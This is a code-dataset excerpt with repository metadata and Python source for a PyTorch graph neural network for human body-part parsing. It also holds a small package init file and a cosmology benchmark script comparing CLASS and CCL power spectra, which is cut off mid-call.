blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c072c513deba039b750e3b8889e19fe875c1bdf6 | 53fca3fa4662a5d04e99445c3baeaaa4169083a1 | /network/gnn08551_final_iter3.py | 0d34db379927cd20545608c0f7c8d3cc6de81609 | [] | no_license | yougoforward/Iter_ParseNet | 223b99aa5eef70b83f2fa5493c26549266a11fe9 | 39367c3332b076678105489ce4a5cf8f250491e5 | refs/heads/master | 2021-07-12T20:49:19.866085 | 2020-09-06T12:32:35 | 2020-09-06T12:32:35 | 200,991,268 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,649 | py | import functools
import torch
import torch.nn as nn
from torch.nn import functional as F
from inplace_abn.bn import InPlaceABNSync
from modules.com_mod import Bottleneck, ResGridNet, SEModule
from modules.parse_mod import MagicModule
from modules.senet import se_resnext50_32x4d, se_resnet101, senet154
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
from modules.convGRU import ConvGRU
from modules.dcn import DFConv2d
class Composition(nn.Module):
def __init__(self, hidden_dim, parts=2):
super(Composition, self).__init__()
self.conv_ch = nn.Sequential(
nn.Conv2d(2 * hidden_dim, 2 * hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(2 * hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(2 * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
self.com_att = nn.Sequential(
nn.Conv2d(parts * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(hidden_dim, 1, kernel_size=1, padding=0, stride=1, bias=True),
)
def forward(self, xh, xp_list):
com_att = self.com_att(torch.cat(xp_list, dim=1))
xph_message = sum([self.conv_ch(torch.cat([xh, xp * torch.sigmoid(com_att)], dim=1)) for xp in xp_list])
return xph_message, com_att
class Decomposition(nn.Module):
def __init__(self, hidden_dim=10, parts=2):
super(Decomposition, self).__init__()
self.conv_fh = nn.Sequential(
nn.Conv2d(2 * hidden_dim, 2 * hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(2 * hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(2 * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
self.decomp_att = Decomp_att(hidden_dim=hidden_dim, parts=parts)
def forward(self, xf, xh_list):
decomp_att_list, maps = self.decomp_att(xf, xh_list)
decomp_fh_list = [self.conv_fh(torch.cat([xf * decomp_att_list[i+1], xh_list[i]], dim=1)) for i in
range(len(xh_list))]
return decomp_fh_list, decomp_att_list, maps
class Decomp_att(nn.Module):
def __init__(self, hidden_dim=10, parts=2):
super(Decomp_att, self).__init__()
self.conv_fh = nn.Conv2d(hidden_dim, parts+1, kernel_size=1, padding=0, stride=1, bias=True)
self.softmax= nn.Softmax(dim=1)
def forward(self, xf, xh_list):
decomp_map = self.conv_fh(xf)
decomp_att = self.softmax(decomp_map)
decomp_att_list = list(torch.split(decomp_att, 1, dim=1))
return decomp_att_list, decomp_map
def generate_spatial_batch(featmap_H, featmap_W):
import numpy as np
spatial_batch_val = np.zeros((1, featmap_H, featmap_W, 8), dtype=np.float32)
for h in range(featmap_H):
for w in range(featmap_W):
xmin = w / featmap_W * 2 - 1
xmax = (w + 1) / featmap_W * 2 - 1
xctr = (xmin + xmax) / 2
ymin = h / featmap_H * 2 - 1
ymax = (h + 1) / featmap_H * 2 - 1
yctr = (ymin + ymax) / 2
spatial_batch_val[:, h, w, :] = \
[xmin, ymin, xmax, ymax, xctr, yctr, 1 / featmap_W, 1 / featmap_H]
return spatial_batch_val
class Dep_Context(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10):
super(Dep_Context, self).__init__()
self.in_dim = in_dim
self.hidden_dim = hidden_dim
self.W = nn.Parameter(torch.ones(in_dim, hidden_dim))
self.sigmoid = nn.Sigmoid()
self.coord_fea = torch.from_numpy(generate_spatial_batch(30, 30))
self.maxpool = nn.AdaptiveMaxPool2d(1)
self.project = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
self.img_conv = nn.Sequential(nn.Conv2d(in_dim + 8, in_dim, kernel_size=1, stride=1, padding=0, bias=True))
self.node_conv = nn.Sequential(nn.Conv2d(hidden_dim + 8, hidden_dim, kernel_size=1, stride=1, padding=0, bias=True))
self.pool = nn.MaxPool2d(kernel_size=(2,2))
def forward(self, p_fea, hu):
n, c, h, w = p_fea.size()
query = self.pool(p_fea)
key = self.pool(hu)
n, c, hp, wp = query.size()
# coord_fea = torch.from_numpy(generate_spatial_batch(n,h,w)).to(p_fea.device).view(n,-1,8) #n,hw,8
coord_fea = self.coord_fea.to(p_fea.device).repeat((n, 1, 1, 1)).permute(0, 3, 1, 2)
project1 = torch.matmul(self.img_conv(torch.cat([query, coord_fea], dim=1)).view(n, -1, hp*wp).permute(0,2,1), self.W) # n,hw,hidden
energy = torch.matmul(project1, self.node_conv(torch.cat([key, coord_fea], dim=1)).view(n, -1, hp*wp)) # n,hw,hw
attention = torch.softmax(energy, dim=-1)
co_context = torch.bmm(key.view(n, -1, hp*wp), attention.permute(0, 2, 1)).view(n, -1, hp, wp)
co_context = self.project(co_context)
co_context =F.interpolate(co_context, (h, w), mode="bilinear", align_corners=True)
return co_context
class Contexture(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10, parts=6, part_list_list=None):
super(Contexture, self).__init__()
self.hidden_dim =hidden_dim
self.F_cont = nn.ModuleList(
[Dep_Context(in_dim, hidden_dim) for i in range(len(part_list_list))])
self.dp_cont = nn.ModuleList(
[nn.Conv2d(in_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=True)
for i in range(len(part_list_list))])
self.parts = parts
self.att_list = nn.ModuleList([nn.Conv2d(hidden_dim, len(part_list_list[i])+ 1, kernel_size=1, padding=0, stride=1, bias=True)
for i in range(len(part_list_list))])
self.context_att_list = nn.ModuleList([nn.Sequential(
nn.Conv2d(hidden_dim, 2, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
) for i in range(len(part_list_list))])
self.softmax = nn.Softmax(dim=1)
def forward(self, xp_list, p_fea, part_list_list):
F_dep_list =[self.F_cont[i](p_fea, xp_list[i]) for i in range(len(xp_list))]
att_list = [self.att_list[i](self.dp_cont[i](p_fea)) for i in range(len(xp_list))]
# context_att_list = [self.context_att_list[i](F_dep_list[i]) for i in range(len(xp_list))]
att_list_list = [list(torch.split(self.softmax(att_list[i]), 1, dim=1)) for i in range(len(xp_list))]
return F_dep_list, att_list_list, att_list
class Part_Dependency(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10):
super(Part_Dependency, self).__init__()
self.R_dep = nn.Sequential(
nn.Conv2d(2*hidden_dim, 2 * hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(2 * hidden_dim), nn.ReLU(inplace=False),
nn.Conv2d(2 * hidden_dim, hidden_dim, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False)
)
def forward(self, F_dep_hu, hv):
huv = self.R_dep(torch.cat([F_dep_hu, hv], dim=1))
return huv
class conv_Update(nn.Module):
def __init__(self, hidden_dim=10):
super(conv_Update, self).__init__()
self.hidden_dim = hidden_dim
dtype = torch.cuda.FloatTensor
self.update = ConvGRU(input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(1, 1),
num_layers=1,
dtype=dtype,
batch_first=True,
bias=True,
return_all_layers=False)
def forward(self, x, message):
_, out = self.update(message.unsqueeze(1), [x])
return out[0][0]
class DecoderModule(nn.Module):
def __init__(self, num_classes):
super(DecoderModule, self).__init__()
self.conv0 = nn.Sequential(nn.Conv2d(512, 512, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(512), nn.ReLU(inplace=False))
self.conv1 = nn.Sequential(nn.Conv2d(512, 256, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False))
# self.conv2 = nn.Sequential(nn.Conv2d(256, 48, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),
# BatchNorm2d(48), nn.ReLU(inplace=False))
#
# self.conv3 = nn.Sequential(nn.Conv2d(304, 256, kernel_size=1, padding=0, dilation=1, bias=False),
# BatchNorm2d(256), nn.ReLU(inplace=False),
# nn.Conv2d(256, 256, kernel_size=1, padding=0, dilation=1, bias=False),
# BatchNorm2d(256), nn.ReLU(inplace=False))
# self.conv4 = nn.Conv2d(256, num_classes, kernel_size=1, padding=0, dilation=1, bias=True)
self.alpha = nn.Parameter(torch.ones(1))
def forward(self, xt, xm, xl):
_, _, h, w = xm.size()
xt = self.conv0(F.interpolate(xt, size=(h, w), mode='bilinear', align_corners=True) + self.alpha * xm)
_, _, th, tw = xl.size()
xt_fea = self.conv1(xt)
# xt = F.interpolate(xt_fea, size=(th, tw), mode='bilinear', align_corners=True)
# xl = self.conv2(xl)
# x = torch.cat([xt, xl], dim=1)
# x_fea = self.conv3(x)
# x_seg = self.conv4(x_fea)
return xt_fea
class AlphaHBDecoder(nn.Module):
def __init__(self, hbody_cls):
super(AlphaHBDecoder, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(512, 256, kernel_size=3, padding=1, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False),
nn.Conv2d(256, 256, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False), SEModule(256, reduction=16))
self.alpha_hb = nn.Parameter(torch.ones(1))
def forward(self, x, skip):
_, _, h, w = skip.size()
xup = F.interpolate(x, size=(h, w), mode='bilinear', align_corners=True)
xfuse = xup + self.alpha_hb * skip
xfuse = self.conv1(xfuse)
return xfuse
class AlphaFBDecoder(nn.Module):
def __init__(self, fbody_cls):
super(AlphaFBDecoder, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(512, 256, kernel_size=3, padding=1, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False),
nn.Conv2d(256, 256, kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(256), nn.ReLU(inplace=False), SEModule(256, reduction=16))
self.alpha_fb = nn.Parameter(torch.ones(1))
def forward(self, x, skip):
_, _, h, w = skip.size()
xup = F.interpolate(x, size=(h, w), mode='bilinear', align_corners=True)
xfuse = xup + self.alpha_fb * skip
xfuse = self.conv1(xfuse)
return xfuse
class Full_Graph(nn.Module):
def __init__(self, in_dim=256, hidden_dim=10, cls_p=7, cls_h=3, cls_f=2):
super(Full_Graph, self).__init__()
self.hidden = hidden_dim
self.comp_h = Composition(hidden_dim, parts=2)
self.conv_Update = conv_Update(hidden_dim)
def forward(self, xf, xh_list, xp_list):
comp_h, com_map = self.comp_h(xf, xh_list)
xf = self.conv_Update(xf, comp_h)
return xf, com_map
class Half_Graph(nn.Module):
def __init__(self, upper_part_list=[1, 2, 3, 4], lower_part_list=[5, 6], in_dim=256, hidden_dim=10, cls_p=7,
cls_h=3, cls_f=2):
super(Half_Graph, self).__init__()
self.cls_h = cls_h
self.upper_part_list = upper_part_list
self.lower_part_list = lower_part_list
self.upper_parts_len = len(upper_part_list)
self.lower_parts_len = len(lower_part_list)
self.hidden = hidden_dim
self.decomp_fh_list = Decomposition(hidden_dim, parts=2)
self.comp_u = Composition(hidden_dim, parts=len(upper_part_list))
self.comp_l = Composition(hidden_dim, parts=len(lower_part_list))
self.update_u = conv_Update(hidden_dim)
self.update_l = conv_Update(hidden_dim)
def forward(self, xf, xh_list, xp_list, h_fea):
decomp_list, decomp_att_list, decomp_att_map = self.decomp_fh_list(xf, xh_list)
# upper half
upper_parts = []
for part in self.upper_part_list:
upper_parts.append(xp_list[part - 1])
comp_u, com_u_map = self.comp_u(xh_list[0], upper_parts)
message_u = decomp_list[0] + comp_u
xh_u = self.update_u(xh_list[0], message_u)
# lower half
lower_parts = []
for part in self.lower_part_list:
lower_parts.append(xp_list[part - 1])
comp_l, com_l_map = self.comp_l(xh_list[1], lower_parts)
message_l = decomp_list[1] + comp_l
xh_l = self.update_l(xh_list[1], message_l)
xh_list_new = [xh_u, xh_l]
return xh_list_new, decomp_att_map, com_u_map, com_l_map
class Part_Graph(nn.Module):
def __init__(self, adj_matrix, upper_part_list=[1, 2, 3, 4], lower_part_list=[5, 6], in_dim=256, hidden_dim=10,
cls_p=7, cls_h=3, cls_f=2):
super(Part_Graph, self).__init__()
self.cls_p = cls_p
self.upper_part_list = upper_part_list
self.lower_part_list = lower_part_list
self.edge_index = torch.nonzero(adj_matrix)
self.edge_index_num = self.edge_index.shape[0]
self.part_list_list = [[] for i in range(self.cls_p - 1)]
for i in range(self.edge_index_num):
self.part_list_list[self.edge_index[i, 1]].append(self.edge_index[i, 0])
self.F_dep_list = Contexture(in_dim=in_dim, hidden_dim=hidden_dim, parts=self.cls_p - 1, part_list_list=self.part_list_list)
self.decomp_hpu_list = Decomposition(hidden_dim, parts=len(upper_part_list))
self.decomp_hpl_list = Decomposition(hidden_dim, parts=len(lower_part_list))
self.part_dp = nn.ModuleList([Part_Dependency(in_dim, hidden_dim) for i in range(self.edge_index_num)])
self.node_update_list = nn.ModuleList([conv_Update(hidden_dim) for i in range(self.cls_p - 1)])
def forward(self, xf, xh_list, xp_list, xp):
# upper half
upper_parts = []
for part in self.upper_part_list:
upper_parts.append(xp_list[part - 1])
# lower half
lower_parts = []
for part in self.lower_part_list:
lower_parts.append(xp_list[part - 1])
decomp_pu_list, decomp_pu_att_list, decomp_pu_att_map = self.decomp_hpu_list(xh_list[0], upper_parts)
decomp_pl_list, decomp_pl_att_list, decomp_pl_att_map = self.decomp_hpl_list(xh_list[1], lower_parts)
#dp
F_dep_list, att_list_list, Fdep_att_list = self.F_dep_list(xp_list, xp, self.part_list_list)
xpp_list_list = [[] for i in range(self.cls_p - 1)]
for i in range(self.edge_index_num):
xpp_list_list[self.edge_index[i, 1]].append(
self.part_dp[i](att_list_list[self.edge_index[i, 0]][
1 + self.part_list_list[self.edge_index[i, 0]].index(self.edge_index[i, 1])] *
F_dep_list[self.edge_index[i, 0]], xp_list[self.edge_index[i, 1]]))
xp_list_new = []
for i in range(self.cls_p - 1):
if i + 1 in self.upper_part_list:
message = decomp_pu_list[self.upper_part_list.index(i + 1)] + sum(xpp_list_list[i])
elif i + 1 in self.lower_part_list:
message = decomp_pl_list[self.lower_part_list.index(i + 1)] + sum(xpp_list_list[i])
xp_list_new.append(self.node_update_list[i](xp_list[i], message))
return xp_list_new, decomp_pu_att_map, decomp_pl_att_map, Fdep_att_list
class GNN(nn.Module):
def __init__(self, adj_matrix, upper_half_node=[1, 2, 3, 4], lower_half_node=[5, 6], in_dim=256, hidden_dim=10,
cls_p=7, cls_h=3, cls_f=2):
super(GNN, self).__init__()
self.cp = cls_p
self.ch = cls_h
self.cf = cls_f
self.ch_in = in_dim
self.hidden = hidden_dim
self.upper_half_node = upper_half_node
self.upper_node_len = len(self.upper_half_node)
self.lower_half_node = lower_half_node
self.lower_node_len = len(self.lower_half_node)
self.full_infer = Full_Graph(in_dim, hidden_dim, cls_p, cls_h, cls_f)
self.half_infer = Half_Graph(self.upper_half_node, self.lower_half_node, in_dim, hidden_dim, cls_p, cls_h,
cls_f)
self.part_infer = Part_Graph(adj_matrix, self.upper_half_node, self.lower_half_node, in_dim, hidden_dim, cls_p,
cls_h, cls_f)
def forward(self, xp_list, xh_list, xf, p_fea, h_fea):
# for full body node
xf_new, com_map = self.full_infer(xf, xh_list, xp_list)
# for half body node
xh_list_new, decomp_fh_att_map, com_u_map, com_l_map = self.half_infer(xf, xh_list, xp_list, h_fea)
# for part node
xp_list_new, decomp_up_att_map, decomp_lp_att_map, Fdep_att_list = self.part_infer(xf, xh_list, xp_list, p_fea)
return xp_list_new, xh_list_new, xf_new, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, com_u_map, com_l_map, Fdep_att_list
class GNN_infer(nn.Module):
def __init__(self, adj_matrix, upper_half_node=[1, 2, 3, 4], lower_half_node=[5, 6], in_dim=256, hidden_dim=10,
cls_p=7, cls_h=3, cls_f=2):
super(GNN_infer, self).__init__()
self.cls_p = cls_p
self.cls_h = cls_h
self.cls_f = cls_f
self.in_dim = in_dim
self.hidden_dim = hidden_dim
# feature transform
self.p_conv = nn.Sequential(
nn.Conv2d(in_dim, hidden_dim * (cls_p - 1), kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim * (cls_p - 1)), nn.ReLU(inplace=False))
self.h_conv = nn.Sequential(
nn.Conv2d(in_dim, hidden_dim * (cls_h - 1), kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim * (cls_h - 1)), nn.ReLU(inplace=False))
self.f_conv = nn.Sequential(
nn.Conv2d(in_dim, hidden_dim * (cls_f - 1), kernel_size=1, padding=0, stride=1, bias=False),
BatchNorm2d(hidden_dim * (cls_f - 1)), nn.ReLU(inplace=False))
self.bg_conv = nn.Sequential(
nn.Conv2d(3 * in_dim, hidden_dim, kernel_size=1, padding=0, stride=1,
bias=False),
BatchNorm2d(hidden_dim), nn.ReLU(inplace=False))
# gnn infer
self.gnn = GNN(adj_matrix, upper_half_node, lower_half_node, self.in_dim, self.hidden_dim, self.cls_p,
self.cls_h, self.cls_f)
# node supervision
self.p_cls = nn.Conv2d(hidden_dim * (cls_p-1), (cls_p -1),
kernel_size=1, padding=0, stride=1, bias=True,
groups=(cls_p-1))
self.h_cls = nn.Conv2d(hidden_dim * (cls_h-1), (cls_h -1),
kernel_size=1, padding=0, stride=1, bias=True,
groups=(cls_h-1))
self.f_cls = nn.Conv2d(hidden_dim * (cls_f-1), (cls_f -1),
kernel_size=1, padding=0, stride=1, bias=True,
groups=(cls_f-1))
self.bg_cls = nn.Conv2d(hidden_dim, 1,
kernel_size=1, padding=0, stride=1, bias=True,
groups=1)
self.softmax = nn.Softmax(dim=1)
self.final_cls = Final_classifer(in_dim, hidden_dim, cls_p, cls_h, cls_f)
def forward(self, xp, xh, xf, xl):
# _, _, th, tw = xp.size()
# _, _, h, w = xh.size()
#
# xh = F.interpolate(xh, (th, tw), mode='bilinear', align_corners=True)
# xf = F.interpolate(xf, (th, tw), mode='bilinear', align_corners=True)
# feature transform
f_node = self.f_conv(xf)
p_conv = self.p_conv(xp)
p_node_list = list(torch.split(p_conv, self.hidden_dim, dim=1))
h_conv = self.h_conv(xh)
h_node_list = list(torch.split(h_conv, self.hidden_dim, dim=1))
bg_node = self.bg_conv(torch.cat([xp, xh, xf], dim=1))
# node supervision
bg_cls = self.bg_cls(bg_node)
p_cls = self.p_cls(p_conv)
h_cls = self.h_cls(h_conv)
f_cls = self.f_cls(f_node)
f_seg = torch.cat([bg_cls, f_cls], dim=1)
h_seg = torch.cat([bg_cls, h_cls], dim=1)
p_seg = torch.cat([bg_cls, p_cls], dim=1)
# output
p_seg = [p_seg]
h_seg = [h_seg]
f_seg = [f_seg]
decomp_fh_att_map = []
decomp_up_att_map = []
decomp_lp_att_map = []
com_map = []
com_u_map = []
com_l_map = []
Fdep_att_list = []
# input
p_node_list = [p_node_list]
h_node_list = [h_node_list]
f_node = [f_node]
for iter in range(3):
p_fea_list_new, h_fea_list_new, f_fea_new, decomp_fh_att_map_new, decomp_up_att_map_new, \
decomp_lp_att_map_new, com_map_new, com_u_map_new, com_l_map_new, Fdep_att_list_new = self.gnn(
p_node_list[iter], h_node_list[iter], f_node[iter], xp, xh)
p_node_list.append(p_fea_list_new)
h_node_list.append(h_fea_list_new)
f_node.append(f_fea_new)
decomp_fh_att_map.append(decomp_fh_att_map_new)
decomp_up_att_map.append(decomp_up_att_map_new)
decomp_lp_att_map.append(decomp_lp_att_map_new)
com_map.append(com_map_new)
com_u_map.append(com_u_map_new)
com_l_map.append(com_l_map_new)
Fdep_att_list.append(Fdep_att_list_new)
# node supervision
p_cls_new = self.p_cls(torch.cat(p_fea_list_new, dim=1))
h_cls_new = self.h_cls(torch.cat(h_fea_list_new, dim=1))
f_cls_new = self.f_cls(f_fea_new)
f_seg_new = torch.cat([bg_cls, f_cls_new], dim=1)
h_seg_new = torch.cat([bg_cls, h_cls_new], dim=1)
p_seg_new = torch.cat([bg_cls, p_cls_new], dim=1)
p_seg.append(p_seg_new)
h_seg.append(h_seg_new)
f_seg.append(f_seg_new)
xphf_infer = torch.cat([bg_node] + p_fea_list_new, dim=1)
p_seg_final = self.final_cls(xphf_infer, xp, xh, xf, xl)
p_seg.append(p_seg_final)
return p_seg, h_seg, f_seg, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, com_u_map, com_l_map, Fdep_att_list
class Final_classifer(nn.Module):
def __init__(self, in_dim=256, hidden_dim=20, cls_p=7, cls_h=3, cls_f=2):
super(Final_classifer, self).__init__()
self.cp = cls_p
self.ch = cls_h
self.cf = cls_f
self.ch_in = in_dim
# classifier
self.conv0 = nn.Sequential(nn.Conv2d(in_dim + cls_p*hidden_dim, in_dim, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(in_dim), nn.ReLU(inplace=False),
nn.Conv2d(in_dim, in_dim, kernel_size=3, padding=1, dilation=1, bias=False),
BatchNorm2d(in_dim), nn.ReLU(inplace=False)
)
self.conv2 = nn.Sequential(nn.Conv2d(in_dim, 48, kernel_size=1, stride=1, padding=0, dilation=1, bias=False),
BatchNorm2d(48), nn.ReLU(inplace=False))
self.conv3 = nn.Sequential(nn.Conv2d(in_dim + 48, in_dim, kernel_size=1, padding=0, dilation=1, bias=False),
BatchNorm2d(in_dim), nn.ReLU(inplace=False),
nn.Conv2d(in_dim, in_dim, kernel_size=1, padding=0, dilation=1, bias=False),
BatchNorm2d(in_dim)
)
self.relu = nn.ReLU(inplace=False)
self.p_cls = nn.Conv2d(in_dim, cls_p, kernel_size=1, padding=0, dilation=1, bias=True)
def forward(self, xphf, xp, xh, xf, xl):
# classifier
_, _, th, tw = xl.size()
xt = F.interpolate(self.conv0(torch.cat([xphf, xp], dim=1)), size=(th, tw), mode='bilinear', align_corners=True)
xl = self.conv2(xl)
x = torch.cat([xt, xl], dim=1)
x_fea = self.relu(self.conv3(x)+xt)
xp_seg = self.p_cls(x_fea)
return xp_seg
class Decoder(nn.Module):
def __init__(self, num_classes=7, hbody_cls=3, fbody_cls=2):
super(Decoder, self).__init__()
self.layer5 = MagicModule(2048, 512, 1)
self.layer6 = DecoderModule(num_classes)
self.layerh = AlphaHBDecoder(hbody_cls)
self.layerf = AlphaFBDecoder(fbody_cls)
#
self.adj_matrix = torch.tensor(
[[0, 1, 0, 0, 0, 0], [1, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0], [0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0]], requires_grad=False)
self.gnn_infer = GNN_infer(adj_matrix=self.adj_matrix, upper_half_node=[1, 2, 3, 4], lower_half_node=[5, 6],
in_dim=256, hidden_dim=10, cls_p=7, cls_h=3, cls_f=2)
#
self.layer_dsn = nn.Sequential(nn.Conv2d(1024, 512, kernel_size=3, stride=1, padding=1),
BatchNorm2d(512), nn.ReLU(inplace=False),
nn.Conv2d(512, num_classes, kernel_size=1, stride=1, padding=0, bias=True))
def forward(self, x):
x_dsn = self.layer_dsn(x[-2])
seg = self.layer5(x[-1])
# direct infer
x_fea = self.layer6(seg, x[1], x[0])
alpha_hb_fea = self.layerh(seg, x[1])
alpha_fb_fea = self.layerf(seg, x[1])
# gnn infer
p_seg, h_seg, f_seg, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, \
com_u_map, com_l_map, Fdep_att_list = self.gnn_infer(x_fea, alpha_hb_fea, alpha_fb_fea, x[0])
return p_seg, h_seg, f_seg, decomp_fh_att_map, decomp_up_att_map, decomp_lp_att_map, com_map, com_u_map, com_l_map, Fdep_att_list, x_dsn
class OCNet(nn.Module):
def __init__(self, block, layers, num_classes):
super(OCNet, self).__init__()
self.encoder = ResGridNet(block, layers)
self.decoder = Decoder(num_classes=num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight.data)
elif isinstance(m, InPlaceABNSync):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def get_model(num_classes=20):
# model = OCNet(Bottleneck, [3, 4, 6, 3], num_classes) #50
model = OCNet(Bottleneck, [3, 4, 23, 3], num_classes) # 101
# model = OCNet(Bottleneck, [3, 8, 36, 3], num_classes) #152
return model
| [
"[email protected]"
] | |
783dd1d568ddd1d977bf4a922d2fa5e961d99b73 | 12977c4d2eae4bfd3b7112814a7e63c506e7bbbe | /ad_purchase_compare/__init__.py | be87bd2c85658bae154f92cdd8ca4bdaa35cc039 | [] | no_license | aryaadiputra/addons60_ptgbu_2013 | 211f3ab9fc74cc3e3f4df770b6ada65d24b83977 | b5cf28bdbb347df4c39ffe3ca32355bd2206077b | refs/heads/master | 2020-04-06T04:11:37.667486 | 2016-11-25T03:27:54 | 2016-11-25T03:27:54 | 58,649,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | import purchase
import purchase_requisition_partner
import stock | [
"[email protected]"
] | |
179a046688ec86cdc0a1838723c43484ef4af058 | 6f57761c60582c546423a2a08c769f18236fd153 | /benchmarks/data/codes/run_pk_param_space.py | da414557736a952df54584c6f3e3878402cbf9b5 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"BSD-2-Clause"
] | permissive | LSSTDESC/CCL | 30644922fead0b017c1056e628bec23cf6bc4dfb | 29d46978445678d86a4bee485cb29d30246ff64a | refs/heads/master | 2023-09-03T17:03:17.012019 | 2023-08-08T11:01:33 | 2023-08-08T11:01:33 | 57,389,367 | 118 | 68 | BSD-3-Clause | 2023-08-30T13:25:25 | 2016-04-29T14:08:38 | C | UTF-8 | Python | false | false | 3,398 | py | #!/usr/bin/env python
"""
Generate a set of CLASS power spectra across a set of sample points in
cosmological parameter space, and compare with CCL.
"""
from param_space import *
import os, sys
# Need to specify directory containing 'class' executable
CLASS_ROOT = None
if len(sys.argv) > 1: CLASS_ROOT = sys.argv[1]
assert CLASS_ROOT is not None, \
"Must specify CLASS_ROOT (as argument or in source file)."
PREFIX = "std" # Prefix to use for this run
NSAMP = 100 # No. of sample points in parameter space
SEED = 10 # Random seed to use for sampling
ZVALS = np.arange(0., 3., 0.5) # Redshifts to evaluate P(k) at
# Define parameter space to sample over
param_dict = {
'h': (0.55, 0.8),
'Omega_cdm': (0.15, 0.35),
'Omega_b': (0.018, 0.052),
'A_s': (1.5e-9, 2.5e-9),
'n_s': (0.94, 0.98)
}
# Check that expected output data directories exist
class_datadir = "%s/data/class" % os.path.abspath(".")
ccl_datadir = "%s/data/ccl" % os.path.abspath(".")
if not os.path.exists(class_datadir): os.makedirs(class_datadir)
if not os.path.exists(ccl_datadir): os.makedirs(ccl_datadir)
# Get root filename for CLASS and CCL filenames
root = "%s/%s" % (class_datadir, PREFIX)
ccl_root = "%s/%s" % (ccl_datadir, PREFIX)
# Generate sample points on Latin hypercube
sample_points = generate_latin_hypercube( samples=NSAMP, param_dict=param_dict,
class_root=CLASS_ROOT, seed=SEED )
save_hypercube("%s_params.dat" % root, sample_points)
# Generate CLASS .ini files
print("Writing CLASS linear .ini files")
generate_class_ini(sample_points, root="%s_lin_std" % root,
nonlinear=False, redshifts=ZVALS)
generate_class_ini(sample_points, root="%s_lin_pre" % root,
nonlinear=False, redshifts=ZVALS)
print("Writing CLASS nonlinear .ini files")
generate_class_ini(sample_points, root="%s_nl_std" % root,
nonlinear=True, redshifts=ZVALS)
generate_class_ini(sample_points, root="%s_nl_pre" % root,
nonlinear=True, redshifts=ZVALS)
# Run CLASS on generated .ini files
print("Running CLASS on .ini files")
run_class(fname_pattern="%s_lin_std_?????.ini" % root,
class_root=CLASS_ROOT, precision=False)
run_class(fname_pattern="%s_lin_pre_?????.ini" % root,
class_root=CLASS_ROOT, precision=True)
run_class(fname_pattern="%s_nl_std_?????.ini" % root,
class_root=CLASS_ROOT, precision=False)
run_class(fname_pattern="%s_nl_pre_?????.ini" % root,
class_root=CLASS_ROOT, precision=True)
# Run CCL for the same sets of parameters
generate_ccl_pspec(sample_points, ccl_root,
